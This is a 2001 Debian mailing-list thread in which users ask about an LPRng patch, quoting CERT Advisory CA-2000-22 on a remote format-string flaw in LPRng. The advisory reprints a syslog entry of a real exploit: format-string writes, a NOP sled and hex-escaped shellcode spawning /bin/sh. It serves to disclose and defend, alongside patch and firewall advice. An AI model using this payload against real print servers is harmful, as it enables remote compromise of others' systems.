Hey,
What u mean debian-specific patch?
On Wednesday 10 January 2001 07:44, Ron Rademaker wrote:
> I know there's a debian package of lprng, but I don't know if the patch
> you're talking about is applied to this package, I guess you should check
> the changelog to find out.
>
> Ron Rademaker
>
> On Wed, 10 Jan 2001, V. Achiaga wrote:
> > Does anyone know where can I find a debian-specific patch for the
> > lprng package?
> >
> > Thanks in advance.
> >
> > Why? Just read the following...
> >
> > > Subject: CERT Advisory CA-2000-22
> > >
> > >
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > >
> > > CERT Advisory CA-2000-22 Input Validation Problems in LPRng
> > >
> > > Original release date: December 12, 2000
> > > Last updated: --
> > > Source: CERT/CC
> > >
> > > A complete revision history is at the end of this file.
> > >
> > > Systems Affected
> > >
> > > * Systems running unpatched LPRng software
> > >
> > > Overview
> > >
> > > A popular replacement software package to the BSD lpd printing
> > > service called LPRng contains at least one software defect, known as a
> > > "format string vulnerability,"[1] which may allow remote users to
> > > execute arbitrary code on vulnerable systems.
> > >
> > > I. Description
> > >
> > > LPRng, now being packaged in several open-source operating system
> > > distributions, has a missing format string argument in at least two
> > > calls to the syslog() function.
> > >
> > > Missing format strings in function calls allow user-supplied
> > > arguments to be passed to a susceptible *snprintf() function call.
> > > Remote users with access to the printer port (port 515/tcp) may be able
> > > to pass format-string parameters that can overwrite arbitrary addresses
> > > in the printing service's address space. Such overwriting can cause
> > > segmentation violations leading to denial of printing services or to
> > > the execution of arbitrary code injected through other means into the
> > > memory segments of the printer service.
> > >
> > > Sample syslog entries from successful exploitation of this
> > > vulnerability have been reported, as follows:
> > >
> > > Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
> > > 'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
> > > XXXXXXXXXXXXXXXXXX%.168u%300$nsecurity.%301
> > > $nsecurity%302$n%.192u%303$n
> > > {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90
> > >}
> > > {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90
> > >}
> > > {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90
> > >}
> > > {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90
> > >}
> > > {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90
> > >}
> > > {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90
> > >}
> > > {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90
> > >}
> > > {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90
> > >}
> > > {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90
> > >}
> > > {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90
> > >}
> > > {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90
> > >} {90}{90}
> > > 1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89
> > >}
> > > ]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7
> > >} E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
> > > M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
> > > ?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
> > > E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{
> > >A}'
> > >
> > > This vulnerability has been assigned the identifier CAN-2000-0917 by
> > > the Common Vulnerabilities and Exposures (CVE) group:
> > >
> > > http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
> > >
> > > The CERT/CC has received reports of extensive probing to port
> > > 515/tcp. In addition, we have received some reports of systems
> > > compromised using this vulnerability. Tools exploiting this
> > > vulnerability have been posted to public forums.
> > >
> > > II. Impact
> > >
> > > A remote user may be able to execute arbitrary code with elevated
> > > privileges.
> > >
> > > In addition, the printing service may be disrupted or disabled
> > > entirely.
> > >
> > > III. Solution
> > >
> > > Apply a patch from your vendor
> > >
> > > Upgrade to a non-vulnerable version of LPRng (3.6.25), as described
> > > in the vendor sections below. Alternately, you can obtain the version
> > > of LPRng which fixes the missing format string at:
> > >
> > > ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
> > >
> > > Disallow access to printer service ports (typically 515/tcp) using
> > > firewall or packet-filtering technologies
> > >
> > > Blocking access to the vulnerable service will limit your exposure
> > > to attacks from outside your network perimeter. However, the
> > > vulnerability would still allow local users to gain privileges they
> > > normally shouldn't have; in addition, blocking port 515/tcp at a
> > > network perimeter would still allow any remote user inside the
> > > perimeter to exploit the vulnerability.
> > >
> > > Appendix A. Vendor Information
> > >
> > > Apple
> > >
> > > Apple has conducted an investigation and determined that Mac OS X
> > > Public Beta and Mac OS X Server do not use LPRng and are therefore
> > > not vulnerable to this exploitation.
> > >
> > > Caldera OpenLinux
> > >
> > > See CSSA-2000-033.0 "format bug in LPRng" at:
> > >
> > >
> > > http://www.calderasystems.com/support/security/advisories/CSSA-
> > > 2000-033.0.txt
> > >
> > > Compaq Computer Corporation
> > >
> > > Compaq Tru64 UNIX S/W is not vulnerable.
> > >
> > > FreeBSD
> > >
> > > FreeBSD does not include LPRng in the base system. Older versions of
> > > FreeBSD included a vulnerable version of LPRng in the Ports
> > > Collection but this was corrected almost 2 months ago, prior to the
> > > release of FreeBSD 4.2. See FreeBSD Security Advisory 00:56
> > >
> > > (ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:56.lp
> > > rng.asc) for more information.
> > >
> > > Hewlett-Packard Company
> > >
> > > This does not apply to HP; HP does not ship LPRng on HP-UX.
> > >
> > > IBM
> > >
> > > IBM's AIX operating system is not vulnerable to this security
> > > exploit.
> > >
> > > Microsoft Corporation
> > >
> > > Microsoft doesn't use LPRng in any of its products, so no Microsoft
> > > products are affected by the vulnerability.
> > >
> > > NetBSD
> > >
> > > NetBSD does not include LPRng in the base system; however we do have
> > > a third-party package of LPRng-3.6.8 which is vulnerable. There's work
> > > underway to upgrade it to a non-vulnerable version.
> > >
> > > OpenBSD
> > >
> > > OpenBSD does not ship lprng.
> > >
> > > RedHat
> > >
> > > LPRng Version 3.6.24 and earlier is vulnerable.
> > >
> > > See RHSA-2000:065-04 at:
> > >
> > > http://www.redhat.com/support/errata/RHSA-2000-065-06.html
> > >
> > > SGI
> > >
> > > IRIX does not contain LPRng support.
> > >
> > > SuSE
> > >
> > > SuSE is not vulnerable. Please see additional comments at:
> > >
> > >
> > > http://lists.suse.com/archives/suse-security/2000-Sep/0259.html
> > >
> > > References
> > >
> > > 1. VU#382365: LPRng can pass user-supplied input as a format string
> > > parameter to syslog() calls, CERT/CC, 10/06/2000,
> > > https://www.kb.cert.org/vuls/id/382365
> > > _________________________________________________________________
> > >
> > > The CERT Coordination Center thanks Chris Evans for his initial
> > > report on the vulnerability described in this advisory.
> > > _________________________________________________________________
> > >
> > > Author: This document was written by Jeffrey S Havrilla. Feedback on
> > > this advisory is appreciated.
> > >
> > > ______________________________________________________________________
> > >
> > > This document is available from:
> > > http://www.cert.org/advisories/CA-2000-22.html
> > >
> > > ______________________________________________________________________
> > >
> > > CERT/CC Contact Information
> > >
> > > Email: [EMAIL PROTECTED]
> > > Phone: +1 412-268-7090 (24-hour hotline)
> > > Fax: +1 412-268-6989
> > > Postal address:
> > > CERT Coordination Center
> > > Software Engineering Institute
> > > Carnegie Mellon University
> > > Pittsburgh PA 15213-3890
> > > U.S.A.
> > >
> > > CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) /
> > > EDT(GMT-4) Monday through Friday; they are on call for emergencies
> > > during other hours, on U.S. holidays, and on weekends.
> > >
> > > Using encryption
> > >
> > > We strongly urge you to encrypt sensitive information sent by email.
> > > Our public PGP key is available from
> > >
> > > http://www.cert.org/CERT_PGP.key
> > >
> > > If you prefer to use DES, please call the CERT hotline for more
> > > information.
> > >
> > > Getting security information
> > >
> > > CERT publications and other security information are available from
> > > our web site
> > >
> > > http://www.cert.org/
> > >
> > > To subscribe to the CERT mailing list for advisories and bulletins,
> > > send email to [EMAIL PROTECTED] Please include in the body of your
> > > message
> > >
> > > subscribe cert-advisory
> > >
> > > * "CERT" and "CERT Coordination Center" are registered in the U.S.
> > > Patent and Trademark Office.
> > >
> > > ______________________________________________________________________
> > >
> > > NO WARRANTY
> > > Any material furnished by Carnegie Mellon University and the
> > > Software Engineering Institute is furnished on an "as is" basis.
> > > Carnegie Mellon University makes no warranties of any kind, either
> > > expressed or implied as to any matter including, but not limited to,
> > > warranty of fitness for a particular purpose or merchantability,
> > > exclusivity or results obtained from use of the material. Carnegie
> > > Mellon University does not make any warranty of any kind with respect
> > > to freedom from patent, trademark, or copyright infringement.
> > > _________________________________________________________________
> > >
> > > Conditions for use, disclaimers, and sponsorship information
> > >
> > > Copyright 2000 Carnegie Mellon University.
> > >
> > > Revision History
> > > Dec 12, 2000: Initial Release
> > >
> > >
> > > -----BEGIN PGP SIGNATURE-----
> > > Version: PGP for Personal Privacy 5.0
> > > Charset: noconv
> > >
> > > iQCVAwUBOjYxtAYcfu8gsZJZAQEp/wP/Zo5uIe1y9vbTEmQz6CtlkLaejrEzzRua
> > > eBakIkIz5CzLKL3+zMFsmTaC306fgFnOcV3lz9NmAzNLg8mqFZYruaTTVuTeY0Yg
> > > +QTWG6DngiqH8ttKV91MjPGZZFpUWahVvVk+xUU/fLCMoc9FAUAenYoOfuduD9nO
> > > w8+1WAtQPUs=
> > > =bNBX
> > > -----END PGP SIGNATURE-----
> >
> > --
> > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > with a subject of "unsubscribe". Trouble? Contact
> > [EMAIL PROTECTED]
